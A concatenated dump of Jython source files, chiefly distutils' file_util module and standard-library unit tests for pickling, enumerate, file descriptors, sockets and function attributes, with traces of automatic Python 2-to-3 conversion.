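#       name = "tasks_pb",
#       src = "tasks.pbtxt",                              # text-format proto source
#       out = "tasks.pb",                                 # binary proto written by Convert
#       proto_message = "org.mlperf.proto.MLPerfConfig",  # package-qualified message name
#       proto_deps = ["//cpp/proto:some_java_proto"],     # java_proto_library providing it
#   )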
``` |
{
"source": "jimmyyu2004/jython",
"score": 2
} |
#### File: Lib/distutils/file_util.py
```python
__revision__ = "$Id: file_util.py 86238 2010-11-06 04:06:18Z eric.araujo $"
import os
from distutils.errors import DistutilsFileError
from distutils import log
# for generating verbose output in 'copy_file()'
_copy_action = {None: 'copying',
'hard': 'hard linking',
'sym': 'symbolically linking'}
def _copy_file_contents(src, dst, buffer_size=16*1024):
"""Copy the file 'src' to 'dst'.
Both must be filenames. Any error opening either file, reading from
'src', or writing to 'dst', raises DistutilsFileError. Data is
read/written in chunks of 'buffer_size' bytes (default 16k). No attempt
is made to handle anything apart from regular files.
"""
# Stolen from shutil module in the standard library, but with
# custom error-handling added.
fsrc = None
fdst = None
try:
try:
fsrc = open(src, 'rb')
except os.error as xxx_todo_changeme3:
(errno, errstr) = xxx_todo_changeme3.args
raise DistutilsFileError("could not open '%s': %s" % (src, errstr))
if os.path.exists(dst):
try:
os.unlink(dst)
except os.error as xxx_todo_changeme:
(errno, errstr) = xxx_todo_changeme.args
raise DistutilsFileError(
"could not delete '%s': %s" % (dst, errstr))
try:
fdst = open(dst, 'wb')
except os.error as xxx_todo_changeme4:
(errno, errstr) = xxx_todo_changeme4.args
raise DistutilsFileError(
"could not create '%s': %s" % (dst, errstr))
while 1:
try:
buf = fsrc.read(buffer_size)
except os.error as xxx_todo_changeme1:
(errno, errstr) = xxx_todo_changeme1.args
raise DistutilsFileError(
"could not read from '%s': %s" % (src, errstr))
if not buf:
break
try:
fdst.write(buf)
except os.error as xxx_todo_changeme2:
(errno, errstr) = xxx_todo_changeme2.args
raise DistutilsFileError(
"could not write to '%s': %s" % (dst, errstr))
finally:
if fdst:
fdst.close()
if fsrc:
fsrc.close()
def copy_file(src, dst, preserve_mode=1, preserve_times=1, update=0,
link=None, verbose=1, dry_run=0):
"""Copy a file 'src' to 'dst'.
If 'dst' is a directory, then 'src' is copied there with the same name;
otherwise, it must be a filename. (If the file exists, it will be
ruthlessly clobbered.) If 'preserve_mode' is true (the default),
the file's mode (type and permission bits, or whatever is analogous on
the current platform) is copied. If 'preserve_times' is true (the
default), the last-modified and last-access times are copied as well.
If 'update' is true, 'src' will only be copied if 'dst' does not exist,
or if 'dst' does exist but is older than 'src'.
'link' allows you to make hard links (os.link) or symbolic links
(os.symlink) instead of copying: set it to "hard" or "sym"; if it is
None (the default), files are copied. Don't set 'link' on systems that
don't support it: 'copy_file()' doesn't check if hard or symbolic
linking is available.
Under Mac OS, uses the native file copy function in macostools; on
other systems, uses '_copy_file_contents()' to copy file contents.
Return a tuple (dest_name, copied): 'dest_name' is the actual name of
the output file, and 'copied' is true if the file was copied (or would
have been copied, if 'dry_run' true).
"""
# XXX if the destination file already exists, we clobber it if
# copying, but blow up if linking. Hmmm. And I don't know what
# macostools.copyfile() does. Should definitely be consistent, and
# should probably blow up if destination exists and we would be
# changing it (ie. it's not already a hard/soft link to src OR
# (not update) and (src newer than dst).
from distutils.dep_util import newer
from stat import ST_ATIME, ST_MTIME, ST_MODE, S_IMODE
if not os.path.isfile(src):
raise DistutilsFileError(
"can't copy '%s': doesn't exist or not a regular file" % src)
if os.path.isdir(dst):
dir = dst
dst = os.path.join(dst, os.path.basename(src))
else:
dir = os.path.dirname(dst)
if update and not newer(src, dst):
if verbose >= 1:
log.debug("not copying %s (output up-to-date)", src)
return dst, 0
try:
action = _copy_action[link]
except KeyError:
raise ValueError("invalid value '%s' for 'link' argument" % link)
if verbose >= 1:
if os.path.basename(dst) == os.path.basename(src):
log.info("%s %s -> %s", action, src, dir)
else:
log.info("%s %s -> %s", action, src, dst)
if dry_run:
return (dst, 1)
# If linking (hard or symbolic), use the appropriate system call
# (Unix only, of course, but that's the caller's responsibility)
if link == 'hard':
if not (os.path.exists(dst) and os.path.samefile(src, dst)):
os.link(src, dst)
elif link == 'sym':
if not (os.path.exists(dst) and os.path.samefile(src, dst)):
os.symlink(src, dst)
# Otherwise (non-Mac, not linking), copy the file contents and
# (optionally) copy the times and mode.
else:
_copy_file_contents(src, dst)
if preserve_mode or preserve_times:
st = os.stat(src)
# According to <NAME> <<EMAIL>>, utime() should be done
# before chmod() (at least under NT).
if preserve_times:
os.utime(dst, (st[ST_ATIME], st[ST_MTIME]))
if preserve_mode and hasattr(os, 'chmod'):
os.chmod(dst, S_IMODE(st[ST_MODE]))
return (dst, 1)
# XXX I suspect this is Unix-specific -- need porting help!
def move_file (src, dst, verbose=1, dry_run=0):
"""Move a file 'src' to 'dst'.
If 'dst' is a directory, the file will be moved into it with the same
name; otherwise, 'src' is just renamed to 'dst'. Return the new
full name of the file.
Handles cross-device moves on Unix using 'copy_file()'. What about
other systems???
"""
from os.path import exists, isfile, isdir, basename, dirname
import errno
if verbose >= 1:
log.info("moving %s -> %s", src, dst)
if dry_run:
return dst
if not isfile(src):
raise DistutilsFileError("can't move '%s': not a regular file" % src)
if isdir(dst):
dst = os.path.join(dst, basename(src))
elif exists(dst):
raise DistutilsFileError(
"can't move '%s': destination '%s' already exists" %
(src, dst))
if not isdir(dirname(dst)):
raise DistutilsFileError(
"can't move '%s': destination '%s' not a valid path" % \
(src, dst))
copy_it = 0
try:
os.rename(src, dst)
except os.error as xxx_todo_changeme6:
(num, msg) = xxx_todo_changeme6.args
if num == errno.EXDEV:
copy_it = 1
else:
raise DistutilsFileError(
"couldn't move '%s' to '%s': %s" % (src, dst, msg))
if copy_it:
copy_file(src, dst, verbose=verbose)
try:
os.unlink(src)
except os.error as xxx_todo_changeme5:
(num, msg) = xxx_todo_changeme5.args
try:
os.unlink(dst)
except os.error:
pass
raise DistutilsFileError(
("couldn't move '%s' to '%s' by copy/delete: " +
"delete '%s' failed: %s") %
(src, dst, src, msg))
return dst
def write_file (filename, contents):
"""Create a file with the specified name and write 'contents' (a
sequence of strings without line terminators) to it.
"""
f = open(filename, "w")
try:
for line in contents:
f.write(line + "\n")
finally:
f.close()
```
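The copy_file()/move_file() docstrings above describe the update, preserve_times, and dry_run behavior; the sketch below exercises the common path on temporary files. It assumes a Python where this distutils module is importable (the stdlib copy was removed in 3.12):
```python
import os
import tempfile
from distutils.file_util import copy_file, move_file, write_file

tmp = tempfile.mkdtemp()
src = os.path.join(tmp, 'src.txt')
write_file(src, ['line one', 'line two'])   # writes each entry followed by a newline

dst, copied = copy_file(src, os.path.join(tmp, 'copy.txt'), update=1, verbose=0)
print(os.path.basename(dst), copied)        # copy.txt 1

# A second copy with update=1 is skipped: the destination is no older than the source
# because preserve_times copied the source mtime onto it.
dst, copied = copy_file(src, os.path.join(tmp, 'copy.txt'), update=1, verbose=0)
print(copied)                               # 0

moved = move_file(src, os.path.join(tmp, 'moved.txt'), verbose=0)
print(os.path.basename(moved), os.path.exists(src))   # moved.txt False
```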
#### File: test/bugs/pr112.py
```python
def f():
pass
if hasattr(f, '__module__'):
print('functions should not have __module__ attributes')
# but make sure classes still do have __module__ attributes
class F:
pass
if not hasattr(F, '__module__'):
print('classes should still have __module__ attributes')
```
#### File: Lib/test/socketserver_test.py
```python
import socket
import threading
import socketserver
import time
from java.lang import Runtime
from java.util.concurrent import Executors, ExecutorCompletionService
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request.recv(1024)
cur_thread = threading.currentThread()
response = "%s: %s" % (cur_thread.getName(), data)
self.request.send(response)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
"mix together"
def client(ip, port, message):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
sock.send(message)
response = sock.recv(1024)
# print threading.currentThread().getName(), response
sock.close()
if __name__ == "__main__":
# ephemeral ports should work on every Java system now
HOST, PORT = "localhost", 0
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
# Start a daemon thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
server_thread.setDaemon(True)
server_thread.start()
# create a client pool to run all client requests
pool = Executors.newFixedThreadPool(Runtime.getRuntime().availableProcessors() + 1)
ecs = ExecutorCompletionService(pool)
for i in range(4000): # empirically, this will exhaust heap when run with 16m heap
ecs.submit(lambda: client(ip, port, "Hello World %i" % i))
ecs.take() # wait until we have a thread available in the pool
pool.shutdown()
```
#### File: Lib/test/test_cpickle.py
```python
import pickle
import unittest
from io import StringIO
from test.pickletester import AbstractPickleTests, AbstractPickleModuleTests
from test import support
class ApproxFloat(unittest.TestCase):
# FIXME for Jython: remove this class - and its use from bases in
# subsequent test classes - when we can guarantee that floats that
# are pickled by cPickle are exact in the same way they are on
# CPython
def test_float(self):
from test.pickletester import protocols
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for proto in protocols:
for value in test_values:
pickle = self.dumps(value, proto)
got = self.loads(pickle)
self.assertAlmostEqual(value, got)
class cPickleTests(ApproxFloat, AbstractPickleTests, AbstractPickleModuleTests):
def setUp(self):
self.dumps = pickle.dumps
self.loads = pickle.loads
error = pickle.BadPickleGet
    module = pickle
@unittest.skipIf(support.is_jython, "FIXME: not working on Jython")
def test_callapi(self):
pass
@unittest.skipIf(support.is_jython, "FIXME: not working on Jython")
def test_dynamic_class(self):
pass
class cPicklePicklerTests(ApproxFloat, AbstractPickleTests):
def dumps(self, arg, proto=0):
f = StringIO()
p = pickle.Pickler(f, proto)
p.dump(arg)
f.seek(0)
return f.read()
def loads(self, buf):
f = StringIO(buf)
p = pickle.Unpickler(f)
return p.load()
error = pickle.BadPickleGet
@unittest.skipIf(support.is_jython, "FIXME: not working on Jython")
def test_dynamic_class(self):
pass
class cPickleListPicklerTests(AbstractPickleTests):
def dumps(self, arg, proto=0):
p = pickle.Pickler(proto)
p.dump(arg)
return p.getvalue()
def loads(self, *args):
f = StringIO(args[0])
p = pickle.Unpickler(f)
return p.load()
error = pickle.BadPickleGet
class cPickleFastPicklerTests(ApproxFloat, AbstractPickleTests):
def dumps(self, arg, proto=0):
f = StringIO()
p = pickle.Pickler(f, proto)
p.fast = 1
p.dump(arg)
f.seek(0)
return f.read()
def loads(self, *args):
f = StringIO(args[0])
p = pickle.Unpickler(f)
return p.load()
error = pickle.BadPickleGet
def test_recursive_list(self):
self.assertRaises(ValueError,
AbstractPickleTests.test_recursive_list,
self)
def test_recursive_inst(self):
self.assertRaises(ValueError,
AbstractPickleTests.test_recursive_inst,
self)
def test_recursive_dict(self):
self.assertRaises(ValueError,
AbstractPickleTests.test_recursive_dict,
self)
def test_recursive_multi(self):
self.assertRaises(ValueError,
AbstractPickleTests.test_recursive_multi,
self)
def test_nonrecursive_deep(self):
# If it's not cyclic, it should pickle OK even if the nesting
# depth exceeds PY_CPICKLE_FAST_LIMIT. That happens to be
# 50 today. <NAME> reported stack overflow on Mac OS 9
# at 64.
a = []
for i in range(60):
a = [a]
b = self.loads(self.dumps(a))
self.assertEqual(a, b)
@unittest.skipIf(support.is_jython, "FIXME: not working on Jython")
def test_dynamic_class(self):
pass
def test_main():
tests = [
cPickleTests,
cPicklePicklerTests,
cPickleListPicklerTests,
cPickleFastPicklerTests
]
if support.is_jython:
# FIXME Jython currently doesn't support list based picklers
tests.remove(cPickleListPicklerTests)
# FIXME these cause NullPointerException on Jython
del cPickleFastPicklerTests.test_recursive_list
del cPickleFastPicklerTests.test_recursive_inst
del cPickleFastPicklerTests.test_recursive_dict
del cPickleFastPicklerTests.test_recursive_multi
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_enumerate.py
```python
import unittest
import sys
from test import support
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
3 // 0
class N:
'Iterator missing next()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class EnumerateTestCase(unittest.TestCase):
enum = enumerate
seq, res = 'abc', [(0, 'a'), (1, 'b'), (2, 'c')]
def test_basicfunction(self):
self.assertEqual(type(self.enum(self.seq)), self.enum)
e = self.enum(self.seq)
self.assertEqual(iter(e), e)
self.assertEqual(list(self.enum(self.seq)), self.res)
self.enum.__doc__
def test_getitemseqn(self):
self.assertEqual(list(self.enum(G(self.seq))), self.res)
e = self.enum(G(''))
self.assertRaises(StopIteration, e.__next__)
def test_iteratorseqn(self):
self.assertEqual(list(self.enum(I(self.seq))), self.res)
e = self.enum(I(''))
self.assertRaises(StopIteration, e.__next__)
def test_iteratorgenerator(self):
self.assertEqual(list(self.enum(Ig(self.seq))), self.res)
e = self.enum(Ig(''))
self.assertRaises(StopIteration, e.__next__)
def test_noniterable(self):
self.assertRaises(TypeError, self.enum, X(self.seq))
def test_illformediterable(self):
self.assertRaises(TypeError, list, self.enum(N(self.seq)))
def test_exception_propagation(self):
self.assertRaises(ZeroDivisionError, list, self.enum(E(self.seq)))
def test_argumentcheck(self):
self.assertRaises(TypeError, self.enum) # no arguments
self.assertRaises(TypeError, self.enum, 1) # wrong type (not iterable)
self.assertRaises(TypeError, self.enum, 'abc', 'a') # wrong type
self.assertRaises(TypeError, self.enum, 'abc', 2, 3) # too many arguments
def test_tuple_reuse(self):
# Tests an implementation detail where tuple is reused
# whenever nothing else holds a reference to it
self.assertEqual(len(set(map(id, list(enumerate(self.seq))))), len(self.seq))
self.assertEqual(len(set(map(id, enumerate(self.seq)))), min(1, len(self.seq)))
class MyEnum(enumerate):
pass
class SubclassTestCase(EnumerateTestCase):
enum = MyEnum
class TestEmpty(EnumerateTestCase):
seq, res = '', []
class TestBig(EnumerateTestCase):
seq = list(range(10, 20000, 2))
res = list(zip(list(range(20000)), seq))
class TestReversed(unittest.TestCase):
def test_simple(self):
class A:
def __getitem__(self, i):
if i < 5:
return str(i)
raise StopIteration
def __len__(self):
return 5
for data in 'abc', list(range(5)), tuple(enumerate('abc')), A(), range(1, 17, 5):
self.assertEqual(list(data)[::-1], list(reversed(data)))
self.assertRaises(TypeError, reversed, {})
def test_xrange_optimization(self):
x = range(1)
self.assertEqual(type(reversed(x)), type(iter(x)))
def test_len(self):
# This is an implementation detail, not an interface requirement
from test.test_iterlen import len
for s in ('hello', tuple('hello'), list('hello'), range(5)):
self.assertEqual(len(reversed(s)), len(s))
r = reversed(s)
list(r)
self.assertEqual(len(r), 0)
class SeqWithWeirdLen:
called = False
def __len__(self):
if not self.called:
self.called = True
return 10
raise ZeroDivisionError
def __getitem__(self, index):
return index
r = reversed(SeqWithWeirdLen())
self.assertRaises(ZeroDivisionError, len, r)
def test_gc(self):
class Seq:
def __len__(self):
return 10
def __getitem__(self, index):
return index
s = Seq()
r = reversed(s)
s.r = r
def test_args(self):
self.assertRaises(TypeError, reversed)
self.assertRaises(TypeError, reversed, [], 'extra')
def test_bug1229429(self):
# this bug was never in reversed, it was in
# PyObject_CallMethod, and reversed_new calls that sometimes.
if not hasattr(sys, "getrefcount"):
return
def f():
pass
r = f.__reversed__ = object()
rc = sys.getrefcount(r)
for i in range(10):
try:
reversed(f)
except TypeError:
pass
else:
self.fail("non-callable __reversed__ didn't raise!")
self.assertEqual(rc, sys.getrefcount(r))
def test_main(verbose=None):
if support.is_jython:
# XXX: CPython implementation details
del EnumerateTestCase.test_tuple_reuse
del TestReversed.test_len
testclasses = (EnumerateTestCase, SubclassTestCase, TestEmpty, TestBig,
TestReversed)
support.run_unittest(*testclasses)
# verify reference counting
import sys
if verbose and hasattr(sys, "gettotalrefcount"):
counts = [None] * 5
for i in range(len(counts)):
support.run_unittest(*testclasses)
counts[i] = sys.gettotalrefcount()
print(counts)
if __name__ == "__main__":
test_main(verbose=True)
```
#### File: Lib/test/test_fileno.py
```python
import errno
import os
import sys
import tempfile
import test.support as support
import unittest
class TestFilenoTestCase(unittest.TestCase):
def setUp(self):
self.filename = tempfile.mktemp()
self.fp = open(self.filename, 'w+')
self.fd = self.fp.fileno()
def tearDown(self):
if self.fp:
self.fp.close()
os.remove(self.filename)
def test_ftruncate(self):
self.fp.write('jython filenos')
self.fp.flush()
os.fsync(self.fd)
self.assertEqual(os.path.getsize(self.filename), 14)
os.ftruncate(self.fd, 8)
self.assertEqual(os.path.getsize(self.filename), 8)
os.ftruncate(self.fd, 0)
self.assertEqual(os.path.getsize(self.filename), 0)
self.fp.close()
raises(OSError, 9, os.ftruncate, self.fd, 0)
def test_lseek(self):
self.assertEqual(os.lseek(self.fd, 0, 1), 0)
os.write(self.fd, 'jython filenos')
os.lseek(self.fd, 7, 0)
self.assertEqual(os.read(self.fd, 7), 'filenos')
self.fp.close()
raises(OSError, 9, os.lseek, self.fd, 0, 1)
def test_read(self):
self.fp.write('jython filenos')
self.fp.flush()
self.fp.seek(0)
result = os.read(self.fd, 7)
self.assertTrue(isinstance(result, str))
self.assertEqual(result, 'jython ')
self.assertEqual(os.read(self.fd, 99), 'filenos')
self.fp.close()
raises(OSError, 9, os.read, self.fd, 1)
def test_write(self):
os.write(self.fd, 'jython filenos')
self.fp.seek(0)
self.assertEqual(self.fp.read(), 'jython filenos')
self.fp.close()
raises(OSError, 9, os.write, self.fd, 'The Larch')
class TestOsOpenTestCase(unittest.TestCase):
def setUp(self):
self.filename = tempfile.mktemp()
self.dir = None
self.fd = None
def tearDown(self):
if self.fd:
try:
os.close(self.fd)
except:
pass
if os.path.exists(self.filename):
os.remove(self.filename)
if self.dir:
os.rmdir(self.dir)
def test_open(self):
# XXX: assert the mode of the file
self.fd = os.open(self.filename, os.O_WRONLY | os.O_CREAT)
self.assertTrue(os.path.exists(self.filename))
os.write(self.fd, 'jython')
os.close(self.fd)
self.fd = os.open(self.filename, os.O_WRONLY | os.O_APPEND)
os.write(self.fd, ' filenos')
os.close(self.fd)
fp = open(self.filename)
self.assertEqual(fp.read(), 'jython filenos')
fp.close()
# falls back to read only without O_WRONLY/O_RDWR
self.fd = os.open(self.filename, os.O_APPEND)
raises(OSError, 9, os.write, self.fd, 'new')
# Acts as append on windows (seeks to the end)
os.lseek(self.fd, 0, 0)
self.assertEqual(os.read(self.fd, len('jython filenos')), 'jython filenos')
os.close(self.fd)
# falls back to read only without O_WRONLY/O_RDWR
self.fd = os.open(self.filename, os.O_CREAT)
raises(OSError, 9, os.write, self.fd, 'new')
self.assertEqual(os.read(self.fd, len('jython filenos')), 'jython filenos')
os.close(self.fd)
# interpreted as RDWR
self.fd = os.open(self.filename, os.O_RDONLY | os.O_RDWR)
os.write(self.fd, 'test')
os.lseek(self.fd, 0, 0)
self.assertEqual(os.read(self.fd, 4), 'test')
os.close(self.fd)
def test_open_truncate(self):
fp = open(self.filename, 'w')
fp.write('hello')
fp.close()
self.assertEqual(os.path.getsize(self.filename), 5)
self.fd = os.open(self.filename, os.O_TRUNC | os.O_RDWR)
self.assertEqual(os.path.getsize(self.filename), 0)
os.write(self.fd, 'truncated')
os.lseek(self.fd, 0, 0)
self.assertEqual(os.read(self.fd, len('truncated')), 'truncated')
os.close(self.fd)
self.fd = os.open(self.filename, os.O_TRUNC | os.O_WRONLY)
self.assertEqual(os.path.getsize(self.filename), 0)
os.write(self.fd, 'write only truncated')
raises(OSError, 9, os.read, self.fd, 99)
os.close(self.fd)
fd = open(self.filename)
self.assertEqual(fd.read(), 'write only truncated')
fd.close()
# Both fail on Windows, errno 22
"""
# falls back to read only without O_WRONLY/O_RDWR, but truncates
self.fd = os.open(self.filename, os.O_TRUNC)
self.assertEquals(os.path.getsize(self.filename), 0)
raises(OSError, 9, os.write, self.fd, 'new')
self.assertEquals(os.read(self.fd, 99), '')
os.close(self.fd)
fp = open(self.filename, 'w')
fp.write('and ')
fp.close()
self.assertEquals(os.path.getsize(self.filename), 4)
# append with no write falls back to read, but still truncates
self.fd = os.open(self.filename, os.O_TRUNC | os.O_APPEND)
self.assertEquals(os.path.getsize(self.filename), 0)
raises(OSError, 9, os.write, self.fd, 'new')
os.close(self.fd)
fp = open(self.filename, 'w')
fp.write('and ')
fp.close()
self.assertEquals(os.path.getsize(self.filename), 4)
"""
def test_open_exclusive(self):
self.assertTrue(not os.path.exists(self.filename))
# fails without O_CREAT
raises(OSError, (2, self.filename), os.open, self.filename, os.O_EXCL)
self.assertTrue(not os.path.exists(self.filename))
# creates, read only
self.fd = os.open(self.filename, os.O_EXCL | os.O_CREAT)
self.assertTrue(os.path.exists(self.filename))
raises(OSError, 9, os.write, self.fd, 'jython')
self.assertEqual(os.read(self.fd, 99), '')
os.close(self.fd)
# not exclusive unless creating
os.close(os.open(self.filename, os.O_EXCL))
raises(OSError, (17, self.filename),
os.open, self.filename, os.O_CREAT | os.O_EXCL)
raises(OSError, (17, self.filename),
os.open, self.filename, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
raises(OSError, (17, self.filename),
os.open, self.filename, os.O_CREAT | os.O_RDWR | os.O_EXCL)
os.remove(self.filename)
self.fd = os.open(self.filename, os.O_EXCL | os.O_RDWR | os.O_CREAT)
os.write(self.fd, 'exclusive')
os.lseek(self.fd, 0, 0)
self.assertEqual(os.read(self.fd, len('exclusive')), 'exclusive')
def test_open_sync(self):
if not hasattr(os, 'O_SYNC'):
return
# Just ensure this works
self.fd = os.open(self.filename, os.O_SYNC | os.O_WRONLY | os.O_CREAT)
self.assertTrue(os.path.exists(self.filename))
os.write(self.fd, 'jython')
raises(OSError, 9, os.read, self.fd, 99)
os.close(self.fd)
os.remove(self.filename)
self.fd = os.open(self.filename, os.O_SYNC | os.O_RDWR | os.O_CREAT)
self.assertTrue(os.path.exists(self.filename))
os.write(self.fd, 'jython')
os.lseek(self.fd, 0, 0)
self.assertEqual(os.read(self.fd, len('jython')), 'jython')
os.close(self.fd)
def test_open_sync_dir(self):
if not hasattr(os, 'O_SYNC'):
return
self.dir = tempfile.mkdtemp()
try:
self.fd = os.open(self.dir, os.O_SYNC | os.O_RDWR)
except OSError as ose:
assert ose.errno == errno.EISDIR, ose.errno
def test_bad_open(self):
for mode in (os.O_WRONLY, os.O_WRONLY, os.O_RDWR):
raises(OSError, (2, self.filename), os.open, self.filename, mode)
open(self.filename, 'w').close()
raises(OSError, (22, self.filename),
os.open, self.filename, os.O_WRONLY | os.O_RDWR)
class TestOsFdopenTestCase(unittest.TestCase):
def setUp(self):
self.filename = tempfile.mktemp()
self.fd = None
def tearDown(self):
if self.fd:
try:
os.close(self.fd)
except:
pass
if os.path.exists(self.filename):
os.remove(self.filename)
def test_fdopen(self):
origw_fp = open(self.filename, 'w')
origw = origw_fp.fileno()
origr_fp = open(self.filename, 'r')
origr = origr_fp.fileno()
# Mode must begin with rwa
raises(ValueError, "invalid file mode 'b'",
os.fdopen, origr, 'b')
# Refuse modes the original file doesn't support
# XXX: allowed on windows CPython
"""
raises(OSError, '[Errno 22] Invalid argument',
os.fdopen, origw, 'r')
raises(OSError, '[Errno 22] Invalid argument',
os.fdopen, origr, 'w')
"""
fp = os.fdopen(origw, 'w')
fp.write('fdopen')
# Windows CPython doesn't raise an exception here
#raises(IOError, '[Errno 9] Bad file descriptor',
# fp.read, 7)
fp.close()
fp = os.fdopen(origr)
self.assertEqual(fp.read(), 'fdopen')
# Windows CPython raises IOError [Errno 0] Error
#raises(IOError, '[Errno 9] Bad file descriptor',
# fp.write, 'test')
raises(IOError, None,
fp.write, 'test')
fp.close()
# Windows CPython raises OSError [Errno 0] Error for both these
#raises(OSError, '[Errno 9] Bad file descriptor',
# os.fdopen, origw, 'w')
#raises(OSError, '[Errno 9] Bad file descriptor',
# os.fdopen, origr, 'r')
raises(OSError, None,
os.fdopen, origw, 'w')
raises(OSError, None,
os.fdopen, origr, 'r')
# These all raise IO/OSErrors on FreeBSD
try:
origw_fp.close()
except:
pass
try:
origr_fp.close()
except:
pass
try:
os.close(origw)
except:
pass
try:
os.close(origr)
except:
pass
def raises(exc, expected, callable, *args):
"""Ensure the specified call raises exc.
    expected is compared against the exception message if it is not None. It
    can be a str, an errno, or a 2-item tuple of (errno, filename); the
    latter two are compared against EnvironmentError messages.
"""
if expected:
if isinstance(expected, str):
msg = expected
else:
errno = expected[0] if isinstance(expected, tuple) else expected
msg = '[Errno %d] %s' % (errno, os.strerror(errno))
if isinstance(expected, tuple):
msg += ': %r' % expected[1]
try:
callable(*args)
except exc as val:
if expected and str(val) != msg:
raise support.TestFailed(
"Message %r, expected %r" % (str(val), msg))
else:
raise support.TestFailed("Expected %s" % exc)
def test_main():
support.run_unittest(TestFilenoTestCase,
TestOsOpenTestCase,
TestOsFdopenTestCase)
if __name__ == '__main__':
test_main()
```
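The raises() helper above rebuilds the expected exception text from an errno (or an errno/filename pair) via os.strerror before comparing it with str(exception). A small standalone sketch of the strings it constructs; the exact wording is platform-dependent:
```python
import os

# What raises(OSError, 9, ...) compares against (Linux wording shown):
print('[Errno %d] %s' % (9, os.strerror(9)))                     # [Errno 9] Bad file descriptor
# What raises(OSError, (2, 'missing.txt'), ...) compares against:
print('[Errno %d] %s: %r' % (2, os.strerror(2), 'missing.txt'))  # [Errno 2] No such file or directory: 'missing.txt'
```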
#### File: Lib/test/test_funcattrs.py
```python
from test import support
import types
import unittest
class FuncAttrsTest(unittest.TestCase):
def setUp(self):
class F:
def a(self):
pass
def b():
return 3
self.f = F
self.fi = F()
self.b = b
def cannot_set_attr(self, obj, name, value, exceptions):
# Helper method for other tests.
try:
setattr(obj, name, value)
except exceptions:
pass
else:
self.fail("shouldn't be able to set %s to %r" % (name, value))
try:
delattr(obj, name)
except exceptions:
pass
else:
self.fail("shouldn't be able to del %s" % name)
class FunctionPropertiesTest(FuncAttrsTest):
# Include the external setUp method that is common to all tests
def test_module(self):
self.assertEqual(self.b.__module__, __name__)
def test_dir_includes_correct_attrs(self):
self.b.known_attr = 7
self.assertIn('known_attr', dir(self.b),
"set attributes not in dir listing of method")
# Test on underlying function object of method
self.f.a.__func__.known_attr = 7
self.assertIn('known_attr', dir(self.f.a),
"set attribute on unbound method implementation in "
"class not in dir")
self.assertIn('known_attr', dir(self.fi.a),
"set attribute on unbound method implementations, "
"should show up in next dir")
def test_duplicate_function_equality(self):
# Body of `duplicate' is the exact same as self.b
def duplicate():
'my docstring'
return 3
self.assertNotEqual(self.b, duplicate)
def test_copying_func_code(self):
def test(): pass
self.assertEqual(test(), None)
test.__code__ = self.b.__code__
self.assertEqual(test(), 3) # self.b always returns 3, arbitrarily
def test_func_globals(self):
self.assertIs(self.b.__globals__, globals())
self.cannot_set_attr(self.b, 'func_globals', 2, TypeError)
def test_func_closure(self):
a = 12
def f(): print(a)
c = f.__closure__
self.assertIsInstance(c, tuple)
self.assertEqual(len(c), 1)
# don't have a type object handy
self.assertEqual(c[0].__class__.__name__, "cell")
self.cannot_set_attr(f, "func_closure", c, TypeError)
def test_empty_cell(self):
def f(): print(a)
try:
f.__closure__[0].cell_contents
except ValueError:
pass
else:
self.fail("shouldn't be able to read an empty cell")
a = 12
def test_func_name(self):
self.assertEqual(self.b.__name__, 'b')
self.assertEqual(self.b.__name__, 'b')
self.b.__name__ = 'c'
self.assertEqual(self.b.__name__, 'c')
self.assertEqual(self.b.__name__, 'c')
self.b.__name__ = 'd'
self.assertEqual(self.b.__name__, 'd')
self.assertEqual(self.b.__name__, 'd')
# __name__ and func_name must be a string
self.cannot_set_attr(self.b, '__name__', 7, TypeError)
self.cannot_set_attr(self.b, 'func_name', 7, TypeError)
# __name__ must be available when in restricted mode. Exec will raise
# AttributeError if __name__ is not available on f.
s = """def f(): pass\nf.__name__"""
exec(s, {'__builtins__': {}})
# Test on methods, too
self.assertEqual(self.f.a.__name__, 'a')
self.assertEqual(self.fi.a.__name__, 'a')
self.cannot_set_attr(self.f.a, "__name__", 'a', AttributeError)
self.cannot_set_attr(self.fi.a, "__name__", 'a', AttributeError)
def test_func_code(self):
num_one, num_two = 7, 8
def a(): pass
def b(): return 12
def c(): return num_one
def d(): return num_two
def e(): return num_one, num_two
for func in [a, b, c, d, e]:
self.assertEqual(type(func.__code__), types.CodeType)
self.assertEqual(c(), 7)
self.assertEqual(d(), 8)
d.__code__ = c.__code__
self.assertEqual(c.__code__, d.__code__)
self.assertEqual(c(), 7)
# self.assertEqual(d(), 7)
try:
b.__code__ = c.__code__
except ValueError:
pass
else:
self.fail("func_code with different numbers of free vars should "
"not be possible")
try:
e.__code__ = d.__code__
except ValueError:
pass
else:
self.fail("func_code with different numbers of free vars should "
"not be possible")
def test_blank_func_defaults(self):
self.assertEqual(self.b.__defaults__, None)
del self.b.__defaults__
self.assertEqual(self.b.__defaults__, None)
def test_func_default_args(self):
def first_func(a, b):
return a+b
def second_func(a=1, b=2):
return a+b
self.assertEqual(first_func.__defaults__, None)
self.assertEqual(second_func.__defaults__, (1, 2))
first_func.__defaults__ = (1, 2)
self.assertEqual(first_func.__defaults__, (1, 2))
